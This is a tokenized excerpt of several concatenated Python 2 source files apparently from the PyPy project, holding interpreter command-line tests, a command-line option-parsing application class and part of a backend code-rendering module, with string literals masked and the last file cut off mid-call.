test_options_i_m ( self ) : <EOL> if sys . platform == "<STR_LIT:win32>" : <EOL> skip ( "<STR_LIT>" ) <EOL> p = os . path . join ( autopath . this_dir , '<STR_LIT>' ) <EOL> p = os . path . abspath ( p ) <EOL> child = self . spawn ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . expect ( re . escape ( '<STR_LIT>' + p ) ) <EOL> child . expect ( re . 
escape ( '<STR_LIT>' + repr ( [ p , '<STR_LIT>' ] ) ) ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT:True>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT:False>' ) <EOL> def test_options_u_i ( self ) : <EOL> if sys . platform == "<STR_LIT:win32>" : <EOL> skip ( "<STR_LIT>" ) <EOL> import subprocess , select , os <EOL> python = sys . executable <EOL> pipe = subprocess . Popen ( [ python , app_main , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> stdout = subprocess . PIPE , <EOL> stdin = subprocess . PIPE , <EOL> stderr = subprocess . STDOUT , <EOL> bufsize = <NUM_LIT:0> , close_fds = True ) <EOL> iwtd , owtd , ewtd = select . select ( [ pipe . stdout ] , [ ] , [ ] , <NUM_LIT:5> ) <EOL> assert iwtd <EOL> data = os . read ( pipe . stdout . fileno ( ) , <NUM_LIT> ) <EOL> assert data . startswith ( '<STR_LIT>' ) <EOL> def test_paste_several_lines_doesnt_mess_prompt ( self ) : <EOL> py . test . skip ( "<STR_LIT>" ) <EOL> child = self . spawn ( [ ] ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> def test_pythoninspect ( self ) : <EOL> old = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT:1>' <EOL> path = getscript ( """<STR_LIT>""" ) <EOL> child = self . spawn ( [ path ] ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> finally : <EOL> os . environ [ '<STR_LIT>' ] = old <EOL> def test_set_pythoninspect ( self ) : <EOL> path = getscript ( """<STR_LIT>""" ) <EOL> child = self . spawn ( [ path ] ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> def test_clear_pythoninspect ( self ) : <EOL> py . test . skip ( "<STR_LIT>" ) <EOL> old = os . environ . 
get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> path = getscript ( """<STR_LIT>""" ) <EOL> child = self . spawn ( [ path ] ) <EOL> xxx <EOL> finally : <EOL> os . environ [ '<STR_LIT>' ] = old <EOL> def test_stdout_flushes_before_stdin_blocks ( self ) : <EOL> path = getscript ( """<STR_LIT>""" ) <EOL> py_py = os . path . join ( autopath . pypydir , '<STR_LIT>' , '<STR_LIT>' ) <EOL> child = self . _spawn ( sys . executable , [ py_py , path ] ) <EOL> child . expect ( '<STR_LIT>' , timeout = <NUM_LIT> ) <EOL> child . sendline ( '<STR_LIT>' ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> def test_no_space_before_argument ( self ) : <EOL> child = self . spawn ( [ '<STR_LIT>' ] ) <EOL> child . expect ( '<STR_LIT:hello>' ) <EOL> child = self . spawn ( [ '<STR_LIT>' ] ) <EOL> child . expect ( '<STR_LIT>' ) <EOL> class TestNonInteractive : <EOL> def run ( self , cmdline , senddata = '<STR_LIT>' , expect_prompt = False , <EOL> expect_banner = False ) : <EOL> cmdline = '<STR_LIT>' % ( sys . executable , app_main , cmdline ) <EOL> print '<STR_LIT>' , cmdline <EOL> child_in , child_out_err = os . popen4 ( cmdline ) <EOL> child_in . write ( senddata ) <EOL> child_in . close ( ) <EOL> data = child_out_err . read ( ) <EOL> child_out_err . close ( ) <EOL> assert ( banner in data ) == expect_banner <EOL> assert ( '<STR_LIT>' in data ) == expect_prompt <EOL> return data <EOL> def test_script_on_stdin ( self ) : <EOL> for extraargs , expected_argv in [ <EOL> ( '<STR_LIT>' , [ '<STR_LIT>' ] ) , <EOL> ( '<STR_LIT:->' , [ '<STR_LIT:->' ] ) , <EOL> ( '<STR_LIT>' , [ '<STR_LIT:->' , '<STR_LIT:hello>' , '<STR_LIT>' ] ) , <EOL> ] : <EOL> data = self . 
run ( '<STR_LIT>' % ( extraargs , demo_script ) ) <EOL> assert "<STR_LIT:hello>" in data <EOL> assert "<STR_LIT>" in data <EOL> assert "<STR_LIT>" in data <EOL> assert ( "<STR_LIT>" + app_main ) in data <EOL> assert ( "<STR_LIT>" + repr ( expected_argv ) ) in data <EOL> assert "<STR_LIT>" in data <EOL> def test_run_crashing_script ( self ) : <EOL> data = self . run ( '<STR_LIT>' % ( crashing_demo_script , ) ) <EOL> assert '<STR_LIT>' in data <EOL> assert '<STR_LIT>' in data <EOL> assert '<STR_LIT>' not in data <EOL> def test_crashing_script_on_stdin ( self ) : <EOL> data = self . run ( '<STR_LIT>' % ( crashing_demo_script , ) ) <EOL> assert '<STR_LIT>' in data <EOL> assert '<STR_LIT>' in data <EOL> assert '<STR_LIT>' not in data <EOL> def test_option_W ( self ) : <EOL> data = self . run ( '<STR_LIT>' ) <EOL> assert '<STR_LIT>' in data <EOL> data = self . run ( '<STR_LIT>' ) <EOL> assert '<STR_LIT>' in data <EOL> def test_option_W_crashing ( self ) : <EOL> data = self . run ( '<STR_LIT>' ) <EOL> assert '<STR_LIT>' in data <EOL> def test_option_W_arg_ignored ( self ) : <EOL> data = self . run ( '<STR_LIT>' ) <EOL> assert "<STR_LIT>" in data <EOL> def test_option_W_arg_ignored2 ( self ) : <EOL> data = self . run ( '<STR_LIT>' ) <EOL> assert "<STR_LIT>" in data <EOL> def test_option_c ( self ) : <EOL> data = self . run ( '<STR_LIT>' ) <EOL> assert '<STR_LIT>' in data <EOL> def test_no_pythonstartup ( self ) : <EOL> old = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> os . environ [ '<STR_LIT>' ] = crashing_demo_script <EOL> data = self . run ( '<STR_LIT>' % ( demo_script , ) ) <EOL> assert '<STR_LIT>' not in data <EOL> data = self . run ( '<STR_LIT>' ) <EOL> assert '<STR_LIT>' not in data <EOL> finally : <EOL> os . environ [ '<STR_LIT>' ] = old <EOL> def test_option_m ( self ) : <EOL> p = os . path . join ( autopath . this_dir , '<STR_LIT>' ) <EOL> p = os . path . abspath ( p ) <EOL> data = self . 
run ( '<STR_LIT>' ) <EOL> assert '<STR_LIT>' in data <EOL> assert '<STR_LIT>' in data <EOL> assert ( '<STR_LIT>' + p ) in data <EOL> assert ( '<STR_LIT>' + repr ( [ p , '<STR_LIT>' ] ) ) in data <EOL> def test_pythoninspect_doesnt_override_isatty ( self ) : <EOL> old = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT:1>' <EOL> data = self . run ( '<STR_LIT>' , senddata = '<STR_LIT>' ) <EOL> assert data == '<STR_LIT>' <EOL> finally : <EOL> os . environ [ '<STR_LIT>' ] = old <EOL> def test_i_flag_overrides_isatty ( self ) : <EOL> data = self . run ( '<STR_LIT>' , senddata = '<STR_LIT>' , <EOL> expect_prompt = True , expect_banner = True ) <EOL> assert '<STR_LIT>' in data <EOL> cmdline = '<STR_LIT>' % getscript ( """<STR_LIT>""" ) <EOL> data = self . run ( cmdline , senddata = '<STR_LIT>' , <EOL> expect_prompt = True , expect_banner = False ) <EOL> assert '<STR_LIT>' in data <EOL> assert '<STR_LIT>' in data <EOL> def test_non_interactive_stdout_fully_buffered ( self ) : <EOL> path = getscript ( r"""<STR_LIT>""" ) <EOL> cmdline = '<STR_LIT>' % ( sys . executable , app_main , path ) <EOL> print '<STR_LIT>' , cmdline <EOL> child_in , child_out_err = os . popen4 ( cmdline ) <EOL> data = child_out_err . read ( <NUM_LIT:11> ) <EOL> assert data == '<STR_LIT>' <EOL> child_in . close ( ) <EOL> data = child_out_err . read ( <NUM_LIT:11> ) <EOL> assert data == '<STR_LIT>' <EOL> child_out_err . close ( ) </s>
<s> import py <EOL> from pypy . translator . oosupport . test_template . constant import BaseTestConstant <EOL> from pypy . translator . jvm . test . runtest import JvmTest <EOL> class TestConstant ( BaseTestConstant , JvmTest ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> __version__ = '<STR_LIT:1.0>' <EOL> import sys , getopt , string , glob , os , traceback , re <EOL> def _getopt_flags ( options ) : <EOL> """<STR_LIT>""" <EOL> s = [ ] <EOL> l = [ ] <EOL> for o in options : <EOL> if o . prefix == '<STR_LIT:->' : <EOL> s . append ( o . name ) <EOL> if o . takes_argument : <EOL> s . append ( '<STR_LIT::>' ) <EOL> else : <EOL> if o . takes_argument : <EOL> l . append ( o . name + '<STR_LIT:=>' ) <EOL> else : <EOL> l . append ( o . name ) <EOL> return string . join ( s , '<STR_LIT>' ) , l <EOL> def invisible_input ( prompt = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> import getpass <EOL> entry = getpass . getpass ( prompt ) <EOL> if entry is None : <EOL> raise KeyboardInterrupt <EOL> return entry <EOL> def option_dict ( options ) : <EOL> """<STR_LIT>""" <EOL> d = { } <EOL> for option in options : <EOL> d [ option . name ] = option <EOL> return d <EOL> getpasswd = invisible_input <EOL> _integerRE = re . compile ( '<STR_LIT>' ) <EOL> _integerRangeRE = re . compile ( '<STR_LIT>' ) <EOL> def srange ( s , <EOL> split = string . split , integer = _integerRE , <EOL> integerRange = _integerRangeRE ) : <EOL> """<STR_LIT>""" <EOL> l = [ ] <EOL> append = l . append <EOL> for entry in split ( s , '<STR_LIT:U+002C>' ) : <EOL> m = integer . match ( entry ) <EOL> if m : <EOL> append ( int ( m . groups ( ) [ <NUM_LIT:0> ] ) ) <EOL> continue <EOL> m = integerRange . match ( entry ) <EOL> if m : <EOL> start , end = map ( int , m . 
groups ( ) ) <EOL> l [ len ( l ) : ] = range ( start , end + <NUM_LIT:1> ) <EOL> return l <EOL> class Option : <EOL> """<STR_LIT>""" <EOL> default = None <EOL> helptext = '<STR_LIT>' <EOL> prefix = '<STR_LIT:->' <EOL> takes_argument = <NUM_LIT:0> <EOL> has_default = <NUM_LIT:0> <EOL> tab = <NUM_LIT:15> <EOL> def __init__ ( self , name , help = None ) : <EOL> if not name [ : <NUM_LIT:1> ] == '<STR_LIT:->' : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> if name [ <NUM_LIT:1> : <NUM_LIT:2> ] == '<STR_LIT:->' : <EOL> self . prefix = '<STR_LIT>' <EOL> self . name = name [ <NUM_LIT:2> : ] <EOL> else : <EOL> self . name = name [ <NUM_LIT:1> : ] <EOL> if help : <EOL> self . help = help <EOL> def __str__ ( self ) : <EOL> o = self <EOL> name = o . prefix + o . name <EOL> if o . takes_argument : <EOL> name = name + '<STR_LIT>' <EOL> if len ( name ) > self . tab : <EOL> name = name + '<STR_LIT:\n>' + '<STR_LIT:U+0020>' * ( self . tab + <NUM_LIT:1> + len ( o . prefix ) ) <EOL> else : <EOL> name = '<STR_LIT>' % ( self . tab , name ) <EOL> description = o . help <EOL> if o . has_default : <EOL> description = description + '<STR_LIT>' % o . default <EOL> return '<STR_LIT>' % ( name , description ) <EOL> class ArgumentOption ( Option ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , help = None , default = None ) : <EOL> Option . __init__ ( self , name , help ) <EOL> if default is not None : <EOL> self . default = default <EOL> self . has_default = <NUM_LIT:1> <EOL> self . takes_argument = <NUM_LIT:1> <EOL> class SwitchOption ( Option ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , help = None , default = None ) : <EOL> Option . __init__ ( self , name , help ) <EOL> if default is not None : <EOL> self . default = default <EOL> self . 
has_default = <NUM_LIT:1> <EOL> class Application : <EOL> """<STR_LIT>""" <EOL> options = [ ] <EOL> preset_options = [ SwitchOption ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> SwitchOption ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> SwitchOption ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> SwitchOption ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> SwitchOption ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> SwitchOption ( '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> header = '<STR_LIT>' <EOL> name = '<STR_LIT>' <EOL> synopsis = '<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> about = '<STR_LIT>' <EOL> examples = '<STR_LIT>' <EOL> copyright = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> globbing = <NUM_LIT:1> <EOL> debug = <NUM_LIT:0> <EOL> verbose = <NUM_LIT:0> <EOL> values = None <EOL> files = None <EOL> def __init__ ( self , argv = None ) : <EOL> if argv is None : <EOL> argv = sys . argv <EOL> self . filename = os . path . split ( argv [ <NUM_LIT:0> ] ) [ <NUM_LIT:1> ] <EOL> if not self . name : <EOL> self . name = os . path . split ( self . filename ) [ <NUM_LIT:1> ] <EOL> else : <EOL> self . name = self . name <EOL> if not self . header : <EOL> self . header = self . name <EOL> else : <EOL> self . header = self . header <EOL> self . arguments = argv [ <NUM_LIT:1> : ] <EOL> self . option_map = option_dict ( self . options ) <EOL> for option in self . preset_options : <EOL> if not self . option_map . has_key ( option . name ) : <EOL> self . add_option ( option ) <EOL> self . files = [ ] <EOL> try : <EOL> rc = self . startup ( ) <EOL> if rc is not None : <EOL> raise SystemExit ( rc ) <EOL> rc = self . parse ( ) <EOL> if rc is not None : <EOL> raise SystemExit ( rc ) <EOL> rc = self . main ( ) <EOL> if rc is None : <EOL> rc = <NUM_LIT:0> <EOL> except SystemExit , rc : <EOL> pass <EOL> except KeyboardInterrupt : <EOL> print <EOL> print '<STR_LIT>' <EOL> rc = <NUM_LIT:1> <EOL> except : <EOL> print <EOL> print '<STR_LIT>' <EOL> if self . 
debug : <EOL> print <EOL> traceback . print_exc ( <NUM_LIT:20> ) <EOL> rc = <NUM_LIT:1> <EOL> raise SystemExit ( rc ) <EOL> def add_option ( self , option ) : <EOL> """<STR_LIT>""" <EOL> self . options . append ( option ) <EOL> self . option_map [ option . name ] = option <EOL> def startup ( self ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def exit ( self , rc = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> raise SystemExit ( rc ) <EOL> def parse ( self ) : <EOL> """<STR_LIT>""" <EOL> self . values = values = { } <EOL> for o in self . options : <EOL> if o . has_default : <EOL> values [ o . prefix + o . name ] = o . default <EOL> else : <EOL> values [ o . prefix + o . name ] = <NUM_LIT:0> <EOL> flags , lflags = _getopt_flags ( self . options ) <EOL> try : <EOL> optlist , files = getopt . getopt ( self . arguments , flags , lflags ) <EOL> if self . globbing : <EOL> l = [ ] <EOL> for f in files : <EOL> gf = glob . glob ( f ) <EOL> if not gf : <EOL> l . append ( f ) <EOL> else : <EOL> l [ len ( l ) : ] = gf <EOL> files = l <EOL> self . optionlist = optlist <EOL> self . files = files + self . files <EOL> except getopt . error , why : <EOL> self . help ( why ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> rc = self . handle_files ( self . files ) <EOL> if rc is not None : <EOL> sys . exit ( rc ) <EOL> for optionname , value in optlist : <EOL> try : <EOL> value = string . atoi ( value ) <EOL> except ValueError : <EOL> pass <EOL> handlername = '<STR_LIT>' + string . replace ( optionname , '<STR_LIT:->' , '<STR_LIT:_>' ) <EOL> try : <EOL> handler = getattr ( self , handlername ) <EOL> except AttributeError : <EOL> if value == '<STR_LIT>' : <EOL> if values . has_key ( optionname ) : <EOL> values [ optionname ] = values [ optionname ] + <NUM_LIT:1> <EOL> else : <EOL> values [ optionname ] = <NUM_LIT:1> <EOL> else : <EOL> values [ optionname ] = value <EOL> else : <EOL> rc = handler ( value ) <EOL> if rc is not None : <EOL> raise SystemExit ( rc ) <EOL> rc = self . 
check_files ( self . files ) <EOL> if rc is not None : <EOL> sys . exit ( rc ) <EOL> def check_files ( self , filelist ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def help ( self , note = '<STR_LIT>' ) : <EOL> self . print_header ( ) <EOL> if self . synopsis : <EOL> print '<STR_LIT>' <EOL> try : <EOL> synopsis = self . synopsis % self . name <EOL> except ( NameError , KeyError , TypeError ) : <EOL> synopsis = self . synopsis % self . __dict__ <EOL> print '<STR_LIT:U+0020>' + synopsis <EOL> print <EOL> self . print_options ( ) <EOL> if self . version : <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' % self . version <EOL> print <EOL> if self . about : <EOL> print string . strip ( self . about % self . __dict__ ) <EOL> print <EOL> if note : <EOL> print '<STR_LIT:->' * <NUM_LIT> <EOL> print '<STR_LIT>' , note <EOL> print <EOL> def notice ( self , note ) : <EOL> print '<STR_LIT:->' * <NUM_LIT> <EOL> print '<STR_LIT>' , note <EOL> print '<STR_LIT:->' * <NUM_LIT> <EOL> print <EOL> def print_header ( self ) : <EOL> print '<STR_LIT:->' * <NUM_LIT> <EOL> print self . header % self . __dict__ <EOL> print '<STR_LIT:->' * <NUM_LIT> <EOL> print <EOL> def print_options ( self ) : <EOL> options = self . options <EOL> print '<STR_LIT>' <EOL> if not options : <EOL> print '<STR_LIT>' <EOL> return <EOL> long = filter ( lambda x : x . prefix == '<STR_LIT>' , options ) <EOL> short = filter ( lambda x : x . prefix == '<STR_LIT:->' , options ) <EOL> items = short + long <EOL> for o in options : <EOL> print '<STR_LIT:U+0020>' , o <EOL> print <EOL> def handle_files ( self , files ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def handle_h ( self , arg ) : <EOL> self . help ( ) <EOL> return <NUM_LIT:0> <EOL> def handle_v ( self , value ) : <EOL> """<STR_LIT>""" <EOL> self . verbose = <NUM_LIT:1> <EOL> def handle__help ( self , arg ) : <EOL> self . help ( ) <EOL> return <NUM_LIT:0> <EOL> def handle__debug ( self , arg ) : <EOL> self . 
debug = <NUM_LIT:1> <EOL> def handle__copyright ( self , arg ) : <EOL> self . print_header ( ) <EOL> print string . strip ( self . copyright % self . __dict__ ) <EOL> print <EOL> return <NUM_LIT:0> <EOL> def handle__examples ( self , arg ) : <EOL> self . print_header ( ) <EOL> if self . examples : <EOL> print '<STR_LIT>' <EOL> print <EOL> print string . strip ( self . examples % self . __dict__ ) <EOL> print <EOL> else : <EOL> print '<STR_LIT>' <EOL> print <EOL> return <NUM_LIT:0> <EOL> def main ( self ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> CommandLine = Application <EOL> def _test ( ) : <EOL> class MyApplication ( Application ) : <EOL> header = '<STR_LIT>' <EOL> version = __version__ <EOL> options = [ Option ( '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> def handle_v ( self , arg ) : <EOL> print '<STR_LIT>' <EOL> cmd = MyApplication ( ) <EOL> if not cmd . values [ '<STR_LIT>' ] : <EOL> cmd . help ( ) <EOL> print '<STR_LIT>' , cmd . files <EOL> print '<STR_LIT>' <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> _test ( ) </s>
<s> import py <EOL> from pypy . tool . ansi_print import ansi_log <EOL> log = py . log . Producer ( "<STR_LIT>" ) <EOL> py . log . setconsumer ( "<STR_LIT>" , ansi_log ) <EOL> from pypy . objspace . flow import model as flowmodel <EOL> from pypy . rpython . ootypesystem import ootype <EOL> from pypy . translator . oosupport . treebuilder import SubOperation <EOL> from pypy . translator . oosupport . metavm import InstructionList , StoreResult <EOL> def render_sub_op ( sub_op , db , generator ) : <EOL> op = sub_op . op <EOL> instr_list = db . genoo . opcodes . get ( op . opname , None ) <EOL> assert instr_list is not None , '<STR_LIT>' % op <EOL> assert isinstance ( instr_list , InstructionList ) <EOL> assert instr_list [ - <NUM_LIT:1> ] is StoreResult , "<STR_LIT>" <EOL> db . cts . lltype_to_cts ( op . result . concretetype ) <EOL> for v in op . args : <EOL> db . cts . lltype_to_cts ( v . concretetype ) <EOL> instr_list = InstructionList ( instr_list [ : - <NUM_LIT:1> ] ) <EOL> instr_list . render ( generator , op ) <EOL> class Function ( object ) : <EOL> auto_propagate_exceptions = False <EOL> def __init__ ( self , db , graph , name = None , is_method = False , is_entrypoint = False ) : <EOL> self . db = db <EOL> self . cts = db . genoo . TypeSystem ( db ) <EOL> self . graph = graph <EOL> self . name = self . cts . escape_name ( name or graph . name ) <EOL> self . is_method = is_method <EOL> self . is_entrypoint = is_entrypoint <EOL> self . generator = None <EOL> self . label_counters = { } <EOL> def current_label ( self , prefix = '<STR_LIT:label>' ) : <EOL> current = self . label_counters . get ( prefix , <NUM_LIT:0> ) <EOL> return '<STR_LIT>' % ( prefix , current ) <EOL> def next_label ( self , prefix = '<STR_LIT:label>' ) : <EOL> current = self . label_counters . get ( prefix , <NUM_LIT:0> ) <EOL> self . label_counters [ prefix ] = current + <NUM_LIT:1> <EOL> return self . current_label ( prefix ) <EOL> def get_name ( self ) : <EOL> return self . 
name <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % self . name <EOL> def __hash__ ( self ) : <EOL> return hash ( self . graph ) <EOL> def __eq__ ( self , other ) : <EOL> return self . graph == other . graph <EOL> def __ne__ ( self , other ) : <EOL> return not self == other <EOL> def _is_return_block ( self , block ) : <EOL> return ( not block . exits ) and len ( block . inputargs ) == <NUM_LIT:1> <EOL> def _is_raise_block ( self , block ) : <EOL> return ( not block . exits ) and len ( block . inputargs ) == <NUM_LIT:2> <EOL> def _is_exc_handling_block ( self , block ) : <EOL> return block . exitswitch == flowmodel . c_last_exception <EOL> def begin_render ( self ) : <EOL> raise NotImplementedError <EOL> def render_return_block ( self , block ) : <EOL> raise NotImplementedError <EOL> def render_raise_block ( self , block ) : <EOL> raise NotImplementedError <EOL> def begin_try ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def end_try ( self , target_label ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def begin_catch ( self , llexitcase ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def end_catch ( self , target_label ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def render ( self , ilasm ) : <EOL> if self . db . graph_name ( self . graph ) is not None and not self . is_method : <EOL> return <EOL> self . ilasm = ilasm <EOL> self . generator = self . _create_generator ( self . ilasm ) <EOL> graph = self . graph <EOL> self . begin_render ( ) <EOL> self . return_block = None <EOL> self . raise_block = None <EOL> for block in graph . iterblocks ( ) : <EOL> if self . _is_return_block ( block ) : <EOL> self . return_block = block <EOL> elif self . _is_raise_block ( block ) : <EOL> self . raise_block = block <EOL> else : <EOL> self . set_label ( self . _get_block_name ( block ) ) <EOL> if self . _is_exc_handling_block ( block ) : <EOL> self . 
render_exc_handling_block ( block ) <EOL> else : <EOL> self . render_normal_block ( block ) <EOL> self . before_last_blocks ( ) <EOL> if self . raise_block : <EOL> self . set_label ( self . _get_block_name ( self . raise_block ) ) <EOL> self . render_raise_block ( self . raise_block ) <EOL> if self . return_block : <EOL> self . set_label ( self . _get_block_name ( self . return_block ) ) <EOL> self . render_return_block ( self . return_block ) <EOL> self . end_render ( ) <EOL> if not self . is_method : <EOL> self . db . record_function ( self . graph , self . name ) <EOL> def before_last_blocks ( self ) : <EOL> pass <EOL> def render_exc_handling_block ( self , block ) : <EOL> for op in block . operations [ : - <NUM_LIT:1> ] : <EOL> self . _render_op ( op ) <EOL> anyHandler = False <EOL> for link in block . exits : <EOL> if link . exitcase is None : <EOL> continue <EOL> anyHandler = anyHandler or not self . _auto_propagate ( link , block ) <EOL> if block . operations : <EOL> self . begin_try ( anyHandler ) <EOL> self . _render_op ( block . operations [ - <NUM_LIT:1> ] ) <EOL> for link in block . exits : <EOL> if link . exitcase is None : <EOL> self . _setup_link ( link ) <EOL> self . end_try ( self . _get_block_name ( link . target ) , anyHandler ) <EOL> break <EOL> else : <EOL> assert False , "<STR_LIT>" <EOL> if anyHandler : <EOL> self . introduce_exception_conversions ( <EOL> [ link . exitcase for link in block . exits if link . exitcase ] ) <EOL> for link in block . exits : <EOL> if link . exitcase is None : <EOL> continue <EOL> assert issubclass ( link . exitcase , py . builtin . BaseException ) <EOL> if self . _auto_propagate ( link , block ) : <EOL> continue <EOL> ll_meta_exc = link . llexitcase <EOL> self . record_ll_meta_exc ( ll_meta_exc ) <EOL> self . begin_catch ( link . llexitcase ) <EOL> self . store_exception_and_link ( link ) <EOL> target_label = self . _get_block_name ( link . target ) <EOL> self . end_catch ( target_label ) <EOL> self . 
after_except_block ( ) <EOL> def _auto_propagate ( self , link , block ) : <EOL> assert block . exitswitch is flowmodel . c_last_exception <EOL> if not self . auto_propagate_exceptions : <EOL> return False <EOL> if not self . _is_raise_block ( link . target ) : <EOL> return False <EOL> llexc = link . llexitcase <EOL> i = list ( block . exits ) . index ( link ) <EOL> next_links = block . exits [ i + <NUM_LIT:1> : ] <EOL> for next_link in next_links : <EOL> if ootype . subclassof ( llexc , next_link . llexitcase ) : <EOL> return False <EOL> return True <EOL> def introduce_exception_conversions ( self , llexitcases ) : <EOL> """<STR_LIT>""" <EOL> return <EOL> def after_except_block ( self ) : <EOL> pass <EOL> def record_ll_meta_exc ( self , ll_meta_exc ) : <EOL> self . db . constant_generator . record_const ( ll_meta_exc ) <EOL> def store_exception_and_link ( self , link ) : <EOL> raise NotImplementedError <EOL> def render_normal_block ( self , block ) : <EOL> for op in block . operations : <EOL> self . _render_op ( op ) <EOL> if block . exitswitch is None : <EOL> assert len ( block . exits ) == <NUM_LIT:1> <EOL> link = block . exits [ <NUM_LIT:0> ] <EOL> target_label = self . _get_block_name ( link . target ) <EOL> self . _setup_link ( link ) <EOL> self . generator . branch_unconditionally ( target_label ) <EOL> elif block . exitswitch . concretetype is ootype . Bool : <EOL> self . render_bool_switch ( block ) <EOL> elif block . exitswitch . concretetype in ( ootype . Signed , ootype . SignedLongLong , <EOL> ootype . Unsigned , ootype . UnsignedLongLong , <EOL> ootype . Char , ootype . UniChar ) : <EOL> self . render_numeric_switch ( block ) <EOL> else : <EOL> assert False , '<STR_LIT>' % block . exitswitch . concretetype <EOL> def render_bool_switch ( self , block ) : <EOL> assert len ( block . exits ) == <NUM_LIT:2> <EOL> for link in block . exits : <EOL> if link . exitcase : <EOL> link_true = link <EOL> else : <EOL> link_false = link <EOL> true_label = self . 
next_label ( '<STR_LIT>' ) <EOL> self . generator . load ( block . exitswitch ) <EOL> self . generator . branch_conditionally ( True , true_label ) <EOL> self . _follow_link ( link_false ) <EOL> self . set_label ( true_label ) <EOL> self . _follow_link ( link_true ) <EOL> def render_numeric_switch ( self , block ) : <EOL> log . WARNING ( "<STR_LIT>" ) <EOL> self . render_numeric_switch_naive ( block ) <EOL> def _collect_switch_cases ( self , block ) : <EOL> cases = { } <EOL> for link in block . exits : <EOL> if link . exitcase == "<STR_LIT:default>" : <EOL> default = link , self . next_label ( '<STR_LIT>' ) <EOL> else : <EOL> if block . exitswitch . concretetype in ( ootype . Char , ootype . UniChar ) : <EOL> value = ord ( link . exitcase ) <EOL> else : <EOL> value = link . exitcase <EOL> cases [ value ] = link , self . next_label ( '<STR_LIT>' ) <EOL> values = cases . keys ( ) <EOL> try : <EOL> min_case = min ( values ) <EOL> max_case = max ( values ) <EOL> except ValueError : <EOL> min_case = max_case = <NUM_LIT:0> <EOL> return cases , min_case , max_case , default <EOL> def _is_sparse_switch ( self , cases , min_case , max_case ) : <EOL> if max_case - min_case > <NUM_LIT:3> * len ( cases ) + <NUM_LIT:10> : <EOL> return True <EOL> return False <EOL> def render_switch_case ( self , link , label ) : <EOL> target_label = self . _get_block_name ( link . target ) <EOL> self . set_label ( label ) <EOL> self . _setup_link ( link ) <EOL> self . generator . branch_unconditionally ( target_label ) <EOL> def render_numeric_switch_naive ( self , block ) : <EOL> for link in block . exits : <EOL> target_label = self . _get_block_name ( link . target ) <EOL> if link . exitcase == '<STR_LIT:default>' : <EOL> self . _setup_link ( link ) <EOL> self . generator . branch_unconditionally ( target_label ) <EOL> else : <EOL> next_case = self . next_label ( '<STR_LIT>' ) <EOL> self . generator . push_primitive_constant ( block . exitswitch . concretetype , link . exitcase ) <EOL> self . 
generator . load ( block . exitswitch ) <EOL> self . generator . branch_if_not_equal ( next_case ) <EOL> self . _setup_link ( link ) <EOL> self . generator . branch_unconditionally ( target_label ) <EOL> self . set_label ( next_case ) <EOL> def _follow_link ( self , link ) : <EOL> target_label = self . _get_block_name ( link . target ) <EOL> self . _setup_link ( link ) <EOL> self . generator . branch_unconditionally ( target_label ) <EOL> def _setup_link ( self , link ) : <EOL> target = link . target <EOL> linkvars = [ ] <EOL> for to_load , to_store in zip ( link . args , target . inputargs ) : <EOL> if isinstance ( to_load , flowmodel . Variable ) and to_load . name == to_store . name : <EOL> continue <EOL> if to_load . concretetype is ootype . Void : <EOL> continue <EOL> linkvars . append ( ( to_load , to_store ) ) <EOL> if self . _trace_enabled ( ) : <EOL> self . _trace ( '<STR_LIT>' , writeline = True ) <EOL> for to_load , to_store in linkvars : <EOL> self . _trace_value ( '<STR_LIT>' % ( to_store , to_load ) , to_load ) <EOL> self . _trace ( '<STR_LIT>' , 